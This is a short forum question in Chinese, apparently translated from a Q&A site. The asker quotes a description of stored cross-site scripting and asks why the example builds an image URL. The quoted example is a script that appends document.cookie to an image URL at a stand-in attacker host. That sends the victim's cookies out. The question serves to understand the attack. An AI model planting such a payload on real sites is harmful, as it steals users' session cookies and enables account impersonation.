【发布时间】:2010-04-12 19:43:00
【问题描述】:
引用自http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:
正如这里的许多人可能知道的那样,当前的 XSS 攻击通常有两种形式: 1 - 攻击者将标签上传到公共公告板、博客或其他网站 有一个 XSS 漏洞,许多其他用户会访问。攻击者正常 收集站点 cookie 以供以后冒充用户,但表单提交和其他攻击 有时会被利用。这就是我交谈过的许多人认为 XSS 的原因。 这是一个例子:
有人会在 evilblog.com 上发布以下内容供其他用户处理
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
这将尝试使用用户的 evilblog 从攻击者的服务器上提取图像 URL 中的 cookie。
我的问题:
我不明白上面写的 图像 URL 路径 的目的/结果。谁能详细说明一下?
PS:“这将尝试使用 URL 中用户的 evilblog cookie 从攻击者的服务器上提取图像”是什么意思
【问题讨论】:
标签: xss